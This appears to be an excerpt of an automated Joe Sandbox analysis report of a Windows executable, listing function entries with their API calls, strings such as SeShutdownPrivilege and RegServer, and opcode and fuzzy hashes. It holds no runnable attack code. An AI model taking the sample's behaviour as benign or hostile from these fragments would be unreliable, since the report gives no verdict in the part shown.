                                                                                                                • ShowWindow.USER32(?,?,?,?,?,?,?,?,00000000,00007FF6FD213432), ref: 00007FF6FD21603A
                                                                                                                • FreeResource.KERNEL32 ref: 00007FF6FD216151
                                                                                                                • SendMessageA.USER32 ref: 00007FF6FD2161B3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                • String ID: CABINET
                                                                                                                • API String ID: 1305606123-1940454314
                                                                                                                • Opcode ID: 4cdd7ba035a56cc670f5a63f2d2ca6f6db77a2e8fb1204e6d46781fc6b5b295a
                                                                                                                • Instruction ID: 32c8c61efe46b9b5e074b71860e6975bd4988c99d5565895643d9292f2c48c0d
                                                                                                                • Opcode Fuzzy Hash: 4cdd7ba035a56cc670f5a63f2d2ca6f6db77a2e8fb1204e6d46781fc6b5b295a
                                                                                                                • Instruction Fuzzy Hash: E7416B35A0864286FB108B64AA543796AA0FF89B4AF45C034CB2EC27D1FF3FF00486C0
                                                                                                                Function 00007FF6FD211258 Relevance: 16.6, APIs: 11, Instructions: 125memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                                • String ID:
                                                                                                                • API String ID: 2168512254-0
                                                                                                                • Opcode ID: 5b9a876a687c0cd876b8f10eb9d641b76ea1257b643d82222502781fe655744d
                                                                                                                • Instruction ID: b088ae4c52d9e3f8c74877f3a216602f0ad762edfd5f0359a7fc9e788c32ca97
                                                                                                                • Opcode Fuzzy Hash: 5b9a876a687c0cd876b8f10eb9d641b76ea1257b643d82222502781fe655744d
                                                                                                                • Instruction Fuzzy Hash: CD512F32604A41CAE7108F25E5942AD7BA4FB8DB88F519135DB2DD3798FF3AE444CB80
                                                                                                                Function 00007FF6FD211BF4 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 64shutdownCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ProcessToken$AdjustCloseCurrentExitHandleLookupOpenPrivilegePrivilegesValueWindows
                                                                                                                • String ID: SeShutdownPrivilege
                                                                                                                • API String ID: 2829607268-3733053543
                                                                                                                • Opcode ID: 651b18166e163d38126b57bec11a40fe2d1053f86929e6fedc5c23f0bf928afa
                                                                                                                • Instruction ID: 4d51de96581ca0aa9e2ca6881a7085a6c072840b721a064e6c7f66f6d60f5194
                                                                                                                • Opcode Fuzzy Hash: 651b18166e163d38126b57bec11a40fe2d1053f86929e6fedc5c23f0bf928afa
                                                                                                                • Instruction Fuzzy Hash: F0219572A1864287F7508B20E14577ABB60FBC9749F40D135DB5EC2A94FF3DE0458B80
                                                                                                                Function 00007FF6FD218BF4 Relevance: 9.0, APIs: 6, Instructions: 49timethreadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 4104442557-0
                                                                                                                • Opcode ID: dcb9afa00af80bbd2438476da7bde3a9357a0fac88edcf4c174e2726fe409359
                                                                                                                • Instruction ID: bdd4ef20b097fec436687d6f718846d469512ec7bbaac4b7de2eedf0413ae1b1
                                                                                                                • Opcode Fuzzy Hash: dcb9afa00af80bbd2438476da7bde3a9357a0fac88edcf4c174e2726fe409359
                                                                                                                • Instruction Fuzzy Hash: 3B111526A04B428AEB009F60E9442A833A4FB4975CF404A31EA7DC6794FF79E1A482C0
                                                                                                                Function 00007FF6FD218A1E Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                                • String ID:
                                                                                                                • API String ID: 3192549508-0
                                                                                                                • Opcode ID: 31ba59d9759834a282d63e6df2edccb489d5ae17e54cd4dbc75f9f5da0e92170
                                                                                                                • Instruction ID: 8ffdd4da949df38d582d314313a6940f78e81d2c0fb6476e88a8d0152ed769cd
                                                                                                                • Opcode Fuzzy Hash: 31ba59d9759834a282d63e6df2edccb489d5ae17e54cd4dbc75f9f5da0e92170
                                                                                                                • Instruction Fuzzy Hash: B9B09B0661759241D60557B54E4904516401B465287881554C738C1990E95DA1594644
                                                                                                                Function 00007FF6FD213A4E Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 120threadwindowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: EventItemMessageSendThreadWindow$CreateDesktopDialogResetTerminateText
                                                                                                                • String ID: $124
                                                                                                                • API String ID: 2654313074-3252604691
                                                                                                                • Opcode ID: 102dc3b5d48e4a10d943dd3270078a4fcb1ac186441280d74bee6b8f378a008b
                                                                                                                • Instruction ID: f8b7066810a66b70c40f32c3b76ef008a27bb0972d0c7c7457330bd137e17c54
                                                                                                                • Opcode Fuzzy Hash: 102dc3b5d48e4a10d943dd3270078a4fcb1ac186441280d74bee6b8f378a008b
                                                                                                                • Instruction Fuzzy Hash: 62518031A0864286E7109B15EA84279AAA2FB89B55F54D231CB3DC3BD4FF3EB14587C0
                                                                                                                Function 00007FF6FD217320 Relevance: 23.2, APIs: 10, Strings: 3, Instructions: 438COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                                                • String ID: "$:$RegServer
                                                                                                                • API String ID: 1203814774-766454958
                                                                                                                • Opcode ID: ff462ce63a305f3a2fc0ff44f4bbd5613ae8e25fd08773fadb5e4e06ed0c4393
                                                                                                                • Instruction ID: f2c40d89d915cb1af5d4eabd6a3127be3d0d02c01f14be4cace325a9dc9e617d
                                                                                                                • Opcode Fuzzy Hash: ff462ce63a305f3a2fc0ff44f4bbd5613ae8e25fd08773fadb5e4e06ed0c4393
                                                                                                                • Instruction Fuzzy Hash: 36029061A0C682C5EB218B2856142797BA1AF85790F688535CB7EC76D6FE3FF406C7C0
                                                                                                                Function 00007FF6FD214B70 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 141libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6FD213723), ref: 00007FF6FD214B9A
                                                                                                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6FD213723), ref: 00007FF6FD214BBE
                                                                                                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6FD213723), ref: 00007FF6FD214BDE
                                                                                                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6FD213723), ref: 00007FF6FD214C05
                                                                                                                • GetTempPathA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6FD213723), ref: 00007FF6FD214C36
                                                                                                                • CharPrevA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6FD213723), ref: 00007FF6FD214C54
                                                                                                                • CharPrevA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6FD213723), ref: 00007FF6FD214C6E
                                                                                                                • FreeLibrary.KERNEL32 ref: 00007FF6FD214D50
                                                                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6FD213723), ref: 00007FF6FD214D6C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                                                • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                                • API String ID: 1865808269-1731843650
                                                                                                                • Opcode ID: 00cffe6a6b6efc49b9df64414d7755e864694d57a2bcf60638ec42af2eb0385e
                                                                                                                • Instruction ID: 5f9994be0c418c5df2d208d0d419da69899e691fee36b709fc3a8ac271737462
                                                                                                                • Opcode Fuzzy Hash: 00cffe6a6b6efc49b9df64414d7755e864694d57a2bcf60638ec42af2eb0385e
                                                                                                                • Instruction Fuzzy Hash: 33516E25A0978186EB118B15AA10179BBA0FB89B84F948175CB6EC77D0FF3EF405C7C0
                                                                                                                Function 00007FF6FD212644 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 147registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CharDirectory$NextSystem$CloseEnvironmentExpandOpenQueryStringsUpperValueWindows
                                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                                • API String ID: 229715263-2428544900
                                                                                                                • Opcode ID: 5f260c0c44f67a4d333ec0cf67bdc95a0204cc5ba749ef7936c119a4bc59c0ba
                                                                                                                • Instruction ID: f500d763d697613f838b24801c4bf13f57636d0d928221c7199c2055432b10a7
                                                                                                                • Opcode Fuzzy Hash: 5f260c0c44f67a4d333ec0cf67bdc95a0204cc5ba749ef7936c119a4bc59c0ba
                                                                                                                • Instruction Fuzzy Hash: AD51633260868186EB118B10E5442BABBA0FF89B84F559131EB6E877D4FF3EE445C7D0
                                                                                                                Function 00007FF6FD214F2C Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 183memorywindowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Local$AllocMessage$EnumLanguagesResource$BeepCharCloseFreeLoadMetricsNextOpenQueryStringSystemValueVersion
                                                                                                                • String ID: 124$rce.
                                                                                                                • API String ID: 2929476258-4159208397
                                                                                                                • Opcode ID: 695e6ae24b2fda61812be3d6b4eb2d2880fa2c845b4d1dcc7c30464c9a896a07
                                                                                                                • Instruction ID: ae25ab8ea4e0221e45e6fb5d80d0c4092434cfa36e300e907e88adc097f778e6
                                                                                                                • Opcode Fuzzy Hash: 695e6ae24b2fda61812be3d6b4eb2d2880fa2c845b4d1dcc7c30464c9a896a07
                                                                                                                • Instruction Fuzzy Hash: 2371A421E0878686FB528B25AA003B866A0AF99754F148270DF6DD77D5FF3EF44587C0
                                                                                                                Function 00007FF6FD21351E Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 69windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                                                • String ID: 124
                                                                                                                • API String ID: 3785188418-372045425
                                                                                                                • Opcode ID: 3cd91ea36e2fe533022bde91c2053d597b5ed78ae3c01b02fd4e722d67f546ca
                                                                                                                • Instruction ID: 8d54a1a7b86a55f5a9ec5b84d7da8b1430aa448ea01055b4d0fc466b236418e2
                                                                                                                • Opcode Fuzzy Hash: 3cd91ea36e2fe533022bde91c2053d597b5ed78ae3c01b02fd4e722d67f546ca
                                                                                                                • Instruction Fuzzy Hash: 89311E75908642D6EB105B25AA442B87A61FB8AB65F54D230CB3EC23D4FF3EB149C7C0
                                                                                                                Function 00007FF6FD218154 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                                                • String ID: Control Panel\Desktop\ResourceLocale
                                                                                                                • API String ID: 3346862599-1109908249
                                                                                                                • Opcode ID: 92574d76233e057d688226138012ae270226e38269e34de28d45b127ba883e32
                                                                                                                • Instruction ID: e9921b1231c5fe6e05ff1cb336fdcfce92972e499e60717921d2212513f2cdd4
                                                                                                                • Opcode Fuzzy Hash: 92574d76233e057d688226138012ae270226e38269e34de28d45b127ba883e32
                                                                                                                • Instruction Fuzzy Hash: 08518D36A08A819AEB218B249540179B7A0FB89B54F558131DB6DC37C4FF3EF444CBC4
                                                                                                                Function 00007FF6FD211130 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 69librarymemoryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                                • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                • API String ID: 4204503880-1888249752
                                                                                                                • Opcode ID: 971b975d9a4f17aab5bf5b76504fa1808b97cf8c325f714dc856488252334909
                                                                                                                • Instruction ID: 85eac65bd30fd1c84954f2257f00a470bff5842506ffa24ae85fc76128bf4cf7
                                                                                                                • Opcode Fuzzy Hash: 971b975d9a4f17aab5bf5b76504fa1808b97cf8c325f714dc856488252334909
                                                                                                                • Instruction Fuzzy Hash: A2314832608B858AE7108F16F4441AABBA0FB89B80F459139EF5E83754FF3DE045CB80
                                                                                                                Function 00007FF6FD212AE8 Relevance: 12.2, APIs: 8, Instructions: 175COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Char$Next$Upper$ByteFileLeadModuleNamePrev
                                                                                                                • String ID:
                                                                                                                • API String ID: 975904313-0
                                                                                                                • Opcode ID: 0d82e86da81dc2cef2af64c70c057c8b3ef052c49615e3a21940497ab07f1174
                                                                                                                • Instruction ID: 6d305b49aa6da1b94e38bc6c4ed87d7f833861045500a46dc401131fbd44d1d9
                                                                                                                • Opcode Fuzzy Hash: 0d82e86da81dc2cef2af64c70c057c8b3ef052c49615e3a21940497ab07f1174
                                                                                                                • Instruction Fuzzy Hash: 2D719E61A0D6C585FF628F2496103B86A90AF4AB90F488131DBBEC67D1FF2EB40583D1
                                                                                                                Function 00007FF6FD212898 Relevance: 12.2, APIs: 8, Instructions: 162memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Global$Char$FileInfoNextQueryUnlockValueVersion$AllocEnvironmentExpandFreeLockOpenSizeStringsUpper
                                                                                                                • String ID:
                                                                                                                • API String ID: 2156179360-0
                                                                                                                • Opcode ID: f5cf7ecaecd271d02cfedb1b12fcc4206d5a711b6b10f9e7bdb34ea6bdc4f517
                                                                                                                • Instruction ID: f5431a6ef42e3931de76705d50cd5a45cad1a6d50238068a73296ef42451c78b
                                                                                                                • Opcode Fuzzy Hash: f5cf7ecaecd271d02cfedb1b12fcc4206d5a711b6b10f9e7bdb34ea6bdc4f517
                                                                                                                • Instruction Fuzzy Hash: 85615B72A086429AEB608B1596052B83BA5FF05794F14C571EF29D3794FF3AF885C7C0
                                                                                                                Function 00007FF6FD214DC8 Relevance: 10.6, APIs: 7, Instructions: 100COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$CapsDeviceRect$Release
                                                                                                                • String ID:
                                                                                                                • API String ID: 2212493051-0
                                                                                                                • Opcode ID: 69ea89c86bae83f4795465c8798f6678767ed30391b1f5c5e5c0b97e0bec92e7
                                                                                                                • Instruction ID: 2d8bc936a2da14eb31f5b350733970678649bfb92e410ed1d7f1dfd19bbd0755
                                                                                                                • Opcode Fuzzy Hash: 69ea89c86bae83f4795465c8798f6678767ed30391b1f5c5e5c0b97e0bec92e7
                                                                                                                • Instruction Fuzzy Hash: 58318F36B146118AE7108B65E904ABD7BA0F749B99F599130CF2A93B84EF39F4458B80
                                                                                                                Function 00007FF6FD214064 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 71memorystringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00007FF6FD2151F8: FindResourceA.KERNEL32(?,?,00000000,00007FF6FD212F6B), ref: 00007FF6FD215220
                                                                                                                  • Part of subcall function 00007FF6FD2151F8: SizeofResource.KERNEL32(?,?,00000000,00007FF6FD212F6B), ref: 00007FF6FD215231
                                                                                                                  • Part of subcall function 00007FF6FD2151F8: FindResourceA.KERNEL32(?,?,00000000,00007FF6FD212F6B), ref: 00007FF6FD215257
                                                                                                                  • Part of subcall function 00007FF6FD2151F8: LoadResource.KERNEL32(?,?,00000000,00007FF6FD212F6B), ref: 00007FF6FD215268
                                                                                                                  • Part of subcall function 00007FF6FD2151F8: LockResource.KERNEL32(?,?,00000000,00007FF6FD212F6B), ref: 00007FF6FD215277
                                                                                                                  • Part of subcall function 00007FF6FD2151F8: memcpy_s.MSVCRT ref: 00007FF6FD215296
